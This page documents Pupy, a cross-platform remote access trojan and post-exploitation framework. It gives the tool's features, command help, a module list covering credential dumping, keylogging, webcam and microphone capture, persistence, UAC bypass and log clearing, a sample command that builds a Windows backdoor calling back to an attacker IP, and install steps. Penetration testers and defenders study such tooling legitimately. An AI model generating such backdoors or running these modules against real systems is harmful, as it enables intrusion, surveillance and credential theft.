
Pupy

Pupy Description

Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool written mainly in Python.

Pupy is a cross-platform, multi-function RAT and post-exploitation tool written mainly in Python. It follows an all-in-memory execution design and leaves a very small footprint on disk. Pupy can communicate over multiple transports, migrate into other processes using reflective injection, and load remote Python code, Python packages and Python C-extensions from memory.

Features:

  • The Windows payload can load the entire Python interpreter from memory using a reflective DLL.
  • Pupy does not touch the disk.
  • Can be packed into a single .py file and run without any dependencies other than the Python standard library on all OSes.
  • PyCrypto is replaced by pure-Python AES and RSA implementations when it is unavailable.
  • Reflectively migrate into other processes.
  • Remotely import pure-Python packages (.py, .pyc) and compiled Python C extensions (.pyd, .so) from memory.
  • Imported Python modules do not touch the disk.
  • Easily extensible: modules are simple to write and are sorted by OS and category.
  • Modules can directly access Python objects on the remote client using rpyc.
  • Access remote objects interactively from the Pupy shell, with auto-completion of remote attributes.
  • Communication transports are modular and stackable. Exfiltrate data using HTTP over HTTP over AES over XOR, or any combination of the available transports.
  • Communicate using obfsproxy pluggable transports.
  • Execute non-interactive commands on multiple hosts at once.
  • Commands and scripts running on remote hosts are interruptible.
  • Auto-completion for commands and arguments.
  • A custom config can be defined: command aliases, modules automatically run at connection, etc.
  • Open interactive Python shells with auto-completion on the all-in-memory remote Python interpreter.
  • Interactive shells (cmd.exe, /bin/bash, etc.) can be opened remotely.
  • Remote shells on Unix and Windows clients have a real tty with all keyboard signals working, just like an SSH shell.
  • Execute PE executables remotely and from memory.
  • Generate payloads in various formats:

    Format                   Architecture   Short Name
    -----------------------  -------------  -------------
    Android Package          x86 & ARMv7    apk
    Linux Binary             x86            lin_x86
    Linux Binary             x64            lin_x64
    Linux Shared Object      x86            so_x86
    Linux Shared Object      x64            so_x64
    Windows PE Executable    x86            exe_x86
    Windows PE Executable    x64            exe_x64
    Windows DLL              x86            dll_x86
    Windows DLL              x64            dll_x64
    Python Script            x86 & x64      py
    PyInstaller              x86 & x64      pyinst
    Python Oneliner          x86 & x64      py_oneliner
    Powershell               x86 & x64      ps1
    Powershell Oneliner      x86 & x64      ps1_oneliner
    Ducky Script             N/A            rubber_ducky
  • Deploy in memory from a single command line using Python or PowerShell one-liners.
  • Embed "scriptlets" in generated payloads to perform some tasks "offline" without needing network connectivity (e.g. start keylogger, add persistence, execute a custom Python script, check_vm, etc.).
  • Multiple target platforms:

    Platform     Support Status
    -----------  ----------------
    Windows XP   Supported
    Windows 7    Supported
    Windows 8    Supported
    Windows 10   Supported
    Linux        Supported
    Mac OSX      Limited Support
    Android      Limited Support

Homepage: https://github.com/n1nj4sec/pupy

Author: Nicolas VERDIER

License: AS IS

Pupy Help

gen Help

Usage:

gen          [-f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}]
                 [-O {android,windows,linux,solaris}] [-A {x86,x64}] [-U]
                 [-P PACKER] [-S] [-o OUTPUT]
                 [-d <ATTEMPTS> <MIN SEC> <MAX SEC>] [-D OUTPUT_DIR]
                 [-s SCRIPTLET] [-l] [-E] [--no-use-proxy]
                 [--oneliner-nothidden] [--debug-scriptlets] [--debug]
                 [--workdir WORKDIR]
                 [{bind,auto_proxy,dnscnc,connect}] ...

Options:

positional arguments:
  {bind,auto_proxy,dnscnc,connect}
                        Choose a launcher. Launchers make payloads behave
                        differently at startup.
  launcher_args         launcher options

optional arguments:
  -h, --help            show this help message and exit
  -f {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}, --format {client,py,pyinst,py_oneliner,ps1,ps1_oneliner,rubber_ducky,csharp,.NET,.NET_oneliner}
                        (default: client)
  -O {android,windows,linux,solaris}, --os {android,windows,linux,solaris}
                        Target OS (default: windows)
  -A {x86,x64}, --arch {x86,x64}
                        Target arch (default: x86)
  -U, --uncompressed    Use uncompressed template
  -P PACKER, --packer PACKER
                        Use packer when 'client' output format (default: )
  -S, --shared          Create shared object
  -o OUTPUT, --output OUTPUT
                        output filename
  -d <ATTEMPTS> <MIN SEC> <MAX SEC>, --delays-list <ATTEMPTS> <MIN SEC> <MAX SEC>
                        Format: <max attempts> <min delay (sec)> <max delay
                        (sec)>
  -D OUTPUT_DIR, --output-dir OUTPUT_DIR
                        output folder (default: /root/.config/pupy/output)
  -s SCRIPTLET, --scriptlet SCRIPTLET
                        offline python scriptlets to execute before starting
                        the connection. Multiple scriptlets can be privided.
  -l, --list            list available formats, transports, scriptlets and
                        options
  -E, --prefer-external
                        In case of autodetection prefer external IP
  --no-use-proxy        Don't use the target's proxy configuration even if it
                        is used by target (for ps1_oneliner only for now)
  --oneliner-nothidden  Powershell script not hidden target side (default:
                        False)
  --debug-scriptlets    don't catch scriptlets exceptions on the client for
                        debug purposes
  --debug               build with the debug template (the payload open a
                        console)
  --workdir WORKDIR     Set Workdir (Default = current workdir)

listen Help

Usage:

listen [-h] [-l | -L | -a TRANSPORT [TRANSPORT_ARG1 ...] | -A TRANSPORT
              [TRANSPORT_ARG1 ...] | -r TRANSPORT]

Options:

  -h, --help            show this help message and exit
  -l, --list            show current listeners
  -L, --list-transports
                        show available transports
  -a TRANSPORT [TRANSPORT_ARG1 ...], --add TRANSPORT [TRANSPORT_ARG1 ...]
                        start listener
  -A TRANSPORT [TRANSPORT_ARG1 ...], --add-no-pproxy TRANSPORT [TRANSPORT_ARG1 ...]
                        start listener (ignore pproxy)
  -r TRANSPORT, --remove TRANSPORT
                        stop listener

connect Help

Usage:

connect [-h] -c <host:port>
               [-t {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}]

Options:

positional arguments:
  transport_args        Transport arguments: key=value key=value ...

optional arguments:
  -h, --help            show this help message and exit
  -c <host:port>, --host <host:port>
                        host:port of the pupy server to connect to. You can
                        provide multiple --host arguments to attempt to
                        connect to multiple IPs
  -t {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}, --transport {obfs3,http,ssl,ecm,tcp_cleartext,dfws,rsa,udp_secure,kc4,ec4,ws,scramblesuit,udp_cleartext,ssl_rsa}
                        The transport to use

sessions Help

Usage:

sessions [-h] [-i <filter>] [-g] [-k <id>] [-K] [-d <id>] [-D]

Options:

  -h, --help            show this help message and exit
  -i <filter>, --interact <filter>
                        change the default --filter value for other commands
  -g, --global-reset    reset --interact to the default global behavior
  -k <id>               Kill the selected session
  -K                    Kill all sessions
  -d <id>               Drop the connection (abruptly close the socket)
  -D                    Drop all connections

jobs Help

Usage:

jobs [-h] [-k <job_id> | -K <job_id>] [-l] [-p <job_id>]

Options:

  -h, --help            show this help message and exit
  -k <job_id>, --kill <job_id>
                        print the job current output before killing it
  -K <job_id>, --kill-no-output <job_id>
                        kill job without printing output
  -l, --list            list jobs
  -p <job_id>, --print-output <job_id>
                        print a job output

run Help

Usage:

run [-h] [-1] [-o OUTPUT] [-f <client filter>] [-b] <module> ...

Options:

positional arguments:
  <module>              module
  <arguments>           module arguments

optional arguments:
  -h, --help            show this help message and exit
  -1, --once            Unload new deps after usage
  -o OUTPUT, --output OUTPUT
                        save command output to file.%t - timestamp, %h - host,
                        %m - mac, %c - client shortname, %M - module name, %p
                        - platform, %u - user, %a - ip address
  -f <client filter>, --filter <client filter>
                        filter to a subset of all clients. All fields
                        available in the "info" module can be used. example:
                        run get_info -f 'platform:win release:7 os_arch:64'
  -b, --background      run in background

Modules

CATEGORY  NAME               HELP
---------------------------------------------------------------------------------------------------------------
admin     shares             List Local And Remote Shared Folder And Permission
admin     ls                 List System Files
admin     wmic               Query Wmi Using Wql
admin     psh                Load/Execute Powershell Scripts
admin     ssh                Ssh Client
admin     rfs                Mount Remote Fs As Fuse Fs To Mountpoint
admin     smbspider          Walk Through A Smb Directory And Recursively Search A String Into Files
admin     reg                Search/List/Get/Set/Delete Registry Keys/Values
admin     shell_exec         Execute Shell Commands On A Remote System
admin     logs               Show Logs (Or Try To Search Something)
admin     alive              Request To Send Keepalive Packets On Rpyc Level
admin     rdesktop           Start A Remote Desktop Session Using A Browser Websocket Client
admin     cp                 Copy File Or Directory
admin     interactive_shell  Open An Interactive Command Shell With A Nice Tty
admin     rm                 Remove A File Or A Directory
admin     smb                Copy Files Via Smb Protocol
admin     hibernate          Close Session During X Hours
admin     netstat            List Terminal Sessions
admin     drives             List Valid Drives In The System
admin     become             Become User
admin     sshell             Interactive Ssh Shell
admin     last               List Terminal Sessions
admin     rdp                Enable / Disable Rdp Connection Or Check For Valid Credentials On A Remote Host
admin     w                  List Terminal Sessions
admin     getdomain          Get Primary Domain Controller
admin     cd                 Change Directory
admin     date               Get Current Date
admin     pexec              Execute Shell Commands Non-Interactively On A Remote System In Background Using Popen
admin     ps                 List Processes
admin     zip                Zip / Unzip File Or Directory
admin     mkdir              Create An Empty Directory
admin     dns                Retrieve Domain Name From Ip And Vice Versa
admin     clear_logs         Clear Event Logs
admin     psexec             Launch Remote Commands Using Smbexec Or Wmiexec
admin     pyexec             Execute Python Code On A Remote System
admin     beroot             Check For Privilege Escalation Path
admin     cat                Show Contents Of A File
admin     pyshell            Open An Interactive Python Shell On The Remote Client
admin     mv                 Move File Or Directory
admin     display            Set Display Variable
admin     ip                 List Interfaces
admin     sudo_alias         Write An Alias For Sudo To Retrieve User Password
admin     igd                Upnp Igd Client
admin     stat               Show A Bit More Info About File Path. Acls/Caps/Owner For Now
admin     http               Trivial Get/Post Requests Via Http Protocol
admin     x509               Fetch Certificate From Server
admin     getppid            List Parent Process Information
admin     getpid             List Process Information
admin     services           List Services
admin     getuid             Get Username
admin     pwd                Get Current Working Dir
creds     loot_memory        Crawl Processes Memory And Look For Cleartext Credentials
creds     creddump           Download The Hives From A Remote Windows System And Dump Creds
creds     lazagne            Retrieve Passwords Stored On The Target
creds     mimipy             Run Mimipy To Retrieve Credentials From Memory
creds     memstrings         Dump Printable Strings From Process Memory For Futher Analysis
exploit   mimishell          Execute Mimikatz From Memory (Interactive)
exploit   mimikatz           Execute Mimikatz From Memory (Non-Interactive)
exploit   exploit_suggester  Exploit Suggester
exploit   shellcode_exec     Executes The Supplied Shellcode On A Client
exploit   impersonate        List/Impersonate Process Tokens
gather    keylogger          A Keylogger To Monitor All Keyboards Interaction Including The Clipboard 🙂
gather    hashmon            Try To Find Clear Text Passwords In Memory
gather    get_info           Get Some Informations About One Or Multiple Clients
gather    contacts           To Get Contacts
gather    isearch            Use Windows Search Index To Search For Data
gather    search             Walk Through A Directory And Recursively Search A String Into Files
gather    check_vm           Check If Running On Virtual Machine
gather    outlook            Interact With Outlook Session Of The Targeted User
gather    record_mic         Record Sound With The Microphone !
gather    pywerview          Rewriting Of Some Powerview'S Functionalities In Python
gather    apps               To Interact Manage Applications
gather    call               To Get Call Details
gather    gpstracker         To Interact With Gps
gather    mouselogger        Log Mouse Clicks And Take Screenshots Of Areas Around It
gather    powerview          Execute Powerview Commands
gather    get_hwuuid         Try To Get Uuid (Dmi) Or Machine-Id (Dbus/Linux)
gather    webcamsnap         Take A Webcam Snap
gather    usniper            Globally Capture String Or Register During Execution At Specified
gather    cloudinfo          Retrieve Ec2/Digitalocean Metadata
gather    users              Get Interactive Users
gather    screenshot         Take A Screenshot
gather    ttyrec             Globally Capture Intput/Output To Tty. Compatible With Kernels
general   exit               Exit The Client On The Other Side
general   process_kill       Kill A Process
manage    upload             Upload A File/Directory To A Remote System
manage    edit               Edit Remote File Locally (Download->Edit->Upload)
manage    hide_process       Edit Current Process Argv & Env Not To Look Suspicious
manage    download           Download A File/Directory From A Remote System
manage    getprivs           Manage Current Process Privileges
manage    tasks              Get Info About Registered Background Tasks
manage    memory_exec        Execute A Executable From Memory
manage    lock_screen        Lock The Session
manage    duplicate          Duplicate The Current Pupy Payload By Executing It From Memory
manage    load_package       Load A Python Package Onto A Remote Client. Packages Files Must Be Placed In One Of The Pupy/Packages/<Os>/<Arch>/ Repository
manage    migrate            Migrate Pupy Into Another Process Using Reflective Dll Injection
manage    write              Write Short String To File
manage    env                List/Get/Set/Unset Client Environment Variables
manage    persistence        Enable / Disable Persistence
network   port_scan          Run A Tcp Port Scan
network   forward            Local/Remote Port Forwarding And Socks Proxy
network   tcpdump            Module To Reproduce Some Of The Classic Tcpdump Tool Functions
privesc   getsystem          Try To Get Nt Authority System Privileges
privesc   bypassuac          Be Carefull, Most Of Bypass Methods Are Detected By Av...
privesc   inveigh            Execute Inveigh Commands
privesc   privesc_checker    Linux Privilege Escalation Scripts
troll     text_to_speach     Use Android Text To Speach To Say Something
troll     vibrate            Activate The Phone/Tablet Vibrator
troll     msgbox             Pop Up A Custom Message Box

Usage Example Pupy

Create an executable backdoor file (-f client) for the 64-bit version (-A x64) of Windows (-O windows) that, once launched, connects back (connect) to the attacker's computer at IP address 192.168.1.112, listening on port 43210 (--host 192.168.1.112:43210), using the HTTP-like transport (-t http):

gen -f client -O windows -A x64 connect --host 192.168.1.112:43210 -t http

Start a listener on the attacker's computer that waits for connections over the HTTP-like transport (http) on port 43210:

listen -a http 43210

How to install Pupy

For details on installation, see the article ‘How to install Pupy’.

How to install Pupy in Kali Linux

sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
git clone --recursive https://github.com/n1nj4sec/pupy
cd pupy
python create-workspace.py -DG pupyw
sudo pip2 install rpyc==3.4.4

How to install Pupy in BlackArch

sudo pacman -S pupy
sudo pacman -Rdd python2-rpyc
sudo pip2 install rpyc==3.4.4
